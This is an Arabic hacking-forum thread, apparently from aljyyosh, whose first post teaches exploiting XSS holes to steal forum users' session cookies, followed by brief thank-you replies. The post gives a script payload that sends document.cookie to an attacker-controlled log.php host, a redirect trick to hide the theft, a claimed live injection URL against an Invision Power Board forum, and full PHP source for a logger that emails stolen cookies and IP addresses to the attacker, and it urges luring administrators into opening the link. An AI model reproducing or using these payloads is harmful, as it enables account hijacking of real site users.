اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق


صفحة 1 من 37 123 11 ... الأخيرةالأخيرة
النتائج 1 إلى 10 من 365

الموضوع: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

  1. #1
    محظور Array
    تاريخ التسجيل
    Jul 2012
    المشاركات
    276

    aljyyosh بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق



    السلام عليكم ورحمه الله وبركاته ,,

    الان هذا اول درس لي بهذا القسمبعد الغياب وهو يتكلم عن كيفيه عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط ثغرات
    xss

    طيب نأتي الان الى الكود المهم في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss

    هذا كود سكربت خبيث يأتي بمعلومات الكوكيز تجده دائما ً في عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقطxss
    كود PHP:
    <Script>javascript:alert(document.******)</Script>

    الأن الكود هذا لم يكون بالثغره سوف يظهر لك الكوكيز تبعك وهو يحتوي على نقاط مهمه وهي :
    1- رقم العضويه
    2- الباسورد مشفر md5
    3 - الباسورد مشفر Hash

    ورقم الاستايل وغيره ,, على حسب نوعيه البرنامج المصاب!

    طيب الحين وجدت هذا الكود سوف نربطه باللوج

    ماهو اللوج ؟
    اللوج هذا تربطه مع السكربت الذي ياتي بالكوكيز ,, وبعد ان تربطه كل من فتح السكربت وهو مربوط باللوج سوف يسجل معلومات الكوكيز تبعه باللوج او يرسل الى ايميلك ( على حسب اللوج )

    طيب الان بعد ما ربطته اصبح الرابط :
    كود PHP:
    <Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

    تمام الان :
    عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط = الموقع المربوط فيه اللوج
    log.php = اسم ملف اللوج
    طيب الحين نرفع اللوج على اي موقع عندك وبعد كذا تستبدل
    عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط برابط اللوج الي عندك

    المهم الان هذا السكربت اصبح جاهزا للاستعمال سوف نضعه بكود الثغره ونستبدل :
    كود PHP:
    <Script>javascript:alert(document.******)</Script>

    بـ
    كود PHP:
    <Script>location.href="http://www.xxxxx.com/log.php?id="+document.******</Script>

    الان نخلي مثلا المدير العام او اي عضو تبي تسرق الكوكيز تبعه انه يفتح الرابط

    بتقول كيف بقولك ياااولد انت وراااااسك(6) عاد بطريقتك خليه يفتح الرابط

    طيب الحين بتقولي والله فضيحه يابو خالد لم اخليه يفتح الرابط يطلع عنده اللوج وبيكشفني

    بقوله ولا يهمك اخوي نربطه كمان بموقع للتمويه

    مثلا نربطه بموقع عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط بحيث انه لم يفتح الثغره والمربوط فيها اللوج وموقع جوجل راح يتحول اوتوماتيك الى جوجل وبكذا مايشك

    بتقول كيف يابو خالد بقولك كذا نضع بعد رابط اللوج :
    re=www.google.com&
    بس
    بحيث يكون بعد & يوجد id ... الخ
    يعني يكون الكود :
    كود PHP:
    <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

    طبعا انت استبدل عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باي موقع تبغاه ويفضل يكون الموقع الي مصاب فيه الثغره (1)

    طيب الحين تقول كذا تمام يابو خالد يالله عطنا مثااال

    بعطيكم مثال لثغره الي اكتشفتها انا بمنتديات :Invision Power Board

    الكود للثغره :
    عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط '>**********alert(document.******)</script>
    احنا راح نستبدل :
    كود PHP:
    <Script>javascript:alert(document.******)</Script>

    بـ
    كود PHP:
    <Script>location.href="http://www.xxxxx.com/log.php?re=www.google.com&id="+document.******</Script>

    واستبدل هنا موقع جوجل باي موقع تبغاه

    ورابط اللوج عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط باللوج تبعك

    ====================
    تطبيق :

    التطبيق هنا :
    كود PHP:
    http://www.mahrum.com/forums/index.php?act=idx='>**********alert(document.***** *) </script>

    ===================
    اللوج :
    كود PHP:
    <?php
    // Thnx For Security 4 Arab - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط - عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
    //----- S4a Logger v0.10 -----//
    // Star
    //Your Email --::--
    $ToGet = "Linux_Drox@hotmail.com";
    ////////////////////////////////
    $Ip = $REMOTE_ADDR;
    $Sys = $HTTP_USER_AGENT;
    //////////////////////////////////////////////
    if($ToGet == ''){echo 'Edit Your Email Befor You Use Me !!'; exit();}
    //
    $Time = date("l dS of F Y h:i:s A");

    $Hdr = 'From: Logger <logger@secourty>';

    $Msg = '
    Hi ,, Mr.Attacker :D
    -------------------------------------------
    - Thnx For S4a ,, Security For Arab Forum -
    - s4a -
    - s4a froum -
    ---------------------------------------------------------------------
    - This Script Coded By Devil-00 [ Devil From Palestine ] -
    - <devil-00@hotmail.co.uk><devil.00@gmail.com><devil0f0p@ya hoo.com> -
    ---------------------------------------------------------------------
    - IP ::- [ '
    .$Ip.' ]
    - System ::- [ '
    .$Sys.' ]
    - The ****** ::- [ '
    .$id.' ]
    - Time ::- [ '
    .$Time.' ]
    ---------------------------------------------------------------------
    - root@devil00 ~ ./evilcat /etc/passwd -
    - root@devil00 ~ ./s4acracker passwd --log <log.log> && -
    ---------------------------------------------------------------------
    '
    ;
    $send = mail($ToGet,'S4a - [ New****** ]',$Msg,$Hdr);
    //
    /* &@#&@#&@#&@#&@#&@#&@# code ,, By Devil-00 [ 25/5/2005 ] << v0.10 */
    if(isset($_GET["re"])){
    $&@#&@#&@#&@#&@#&@#&@# = $_GET["re"];
    if(
    $&@#&@#&@#&@#&@#&@#&@# == ""){
    mail ($ToGet,'S4a - [Error]','&@#&@#&@#&@#&@#&@#&@# Is Set And Its Empty !!',$Hdr);
    }else{
    header("location:".$&@#&@#&@#&@#&@#&@#&@#);
    }
    }
    //
    ?>

    استبدل هنا :
    كود PHP:
    $ToGet = "Linux_Drox@hotmail.com";

    الايميل: عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط
    بالايميل تبعك !

    واحفظه بامتداد php طبعا افتح المفكره وحط الكود ولاتنسى تغير ا
    ع التطبيق الا لانه درس عملي فقط لا أكثر ..

    وبإمكانك استغلاله بثغره xss تبع cPanel
    وغيرها من عفوا صاحب الموضوع تعب في احضار الروابط هذه فيرجى منك الرد على موضوعه لترى الروابط تقديرا له ولترى الروابط رٌد باستخدام الوضع المتطور للردفقط xss





  2. #2
    هكر مبتديء Array
    تاريخ التسجيل
    Jul 2012
    المشاركات
    2

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    شرح جميل مشكور

    - - - تم التحديث - - -

    شرح جميل و بسيط مشكور


  3. #3
    هكر مبتديء Array
    تاريخ التسجيل
    Nov 2011
    المشاركات
    3

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    مشكوووووووووووووووور



  4. #4
    هكر نشيط Array الصورة الرمزية Hack-SeBix
    تاريخ التسجيل
    Sep 2012
    المشاركات
    122

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    merciiiiiiiiiiiiiiiiiiiiiii


  5. #5
    هكر مبتديء Array
    تاريخ التسجيل
    Jul 2012
    المشاركات
    2

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    goooooooooooooooooood


  6. #6
    هكر نشيط Array الصورة الرمزية Hacker Rakan
    تاريخ التسجيل
    Jun 2012
    الدولة
    فَ قلب ألحدثُ
    المشاركات
    125

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    مشكور ويعطيك ألف عافيه

    - - - تم التحديث - - -

    .. تسلم اناملك على المجهود الرائع ..
    لاهنت ويعطيك الف عافيه



  7. #7
    هكر متميز Array الصورة الرمزية jok17
    تاريخ التسجيل
    Oct 2010
    الدولة
    Deep-Web
    المشاركات
    733

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    مشكوووووووووووووووور


  8. #8
    هكر نشيط Array الصورة الرمزية Cyb3Rm0uJah3D
    تاريخ التسجيل
    Nov 2012
    الدولة
    وطن عربي
    المشاركات
    130

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    مشكوووووووووووووووور


  9. #9
    هكر مبتديء Array الصورة الرمزية mafiaboy
    تاريخ التسجيل
    Sep 2012
    الدولة
    Algeria
    المشاركات
    55

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    شكرا لك يا أخي على المجهود



  10. #10
    هكر نشيط Array الصورة الرمزية flashmen
    تاريخ التسجيل
    Jul 2012
    المشاركات
    117

    افتراضي رد: بعد غياب طويل / شرح مبسط : استغلال ثغرات xss + تطبيق

    بارك الله فيك اخي


صفحة 1 من 37 123 11 ... الأخيرةالأخيرة

المواضيع المتشابهه

  1. بعد غياب طويل .. ..
    بواسطة noureno-rca في المنتدى المنتدى العام
    مشاركات: 5
    آخر مشاركة: 01-14-2013, 12:48 AM
  2. بعد غياب طويل اختراق بعض المواقع اهداء الى وحوش الجيووش
    بواسطة pSyCh0_3D في المنتدى معرض الانجازات
    مشاركات: 32
    آخر مشاركة: 10-11-2011, 02:56 PM
  3. أجمل أندكس في العالم بعد غياب طويل
    بواسطة zaina في المنتدى قسم إندكسات الإختراق
    مشاركات: 5
    آخر مشاركة: 02-07-2011, 02:18 AM
  4. مشاركات: 12
    آخر مشاركة: 01-05-2011, 08:58 AM

وجد الزوار هذه الصفحة بالبحث عن:

شرح ثغرة xss

استغلال ثغرة xss

استغلال ثغرات xss تطبيق

استغلال ثغرات xss

استغلال ثغرة xss جيوش الهكر

استغلال ثغرة cross site scripting

cross site scripting استغلال

ثغرة xss

اختراق المواقع بثغرة xssطريقة استغلال ثغرة xssشرح اختراق المواقع بثغرة xssxss شرح ثغرةشرح ثغرة xss لاختراق الايميلاتثغرة ياهو 2013http:www.aljyyosh.comvbshowthread.phpt=42499شرح ثغرة Cross Site Scriptingاستغلال ثغرات Cross Site Scriptingطريقة استغلال ثغرات xssشرح ثغرات xss استغلال xssشرح استغلال ثغرات xssبعد غياب طويل شرح مبسط : استغلال ثغرات xss تطبيقمبسط في شرح الثغرات واختراق المواقعسكربة xss الجيوشاستغلال ثغره xss

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •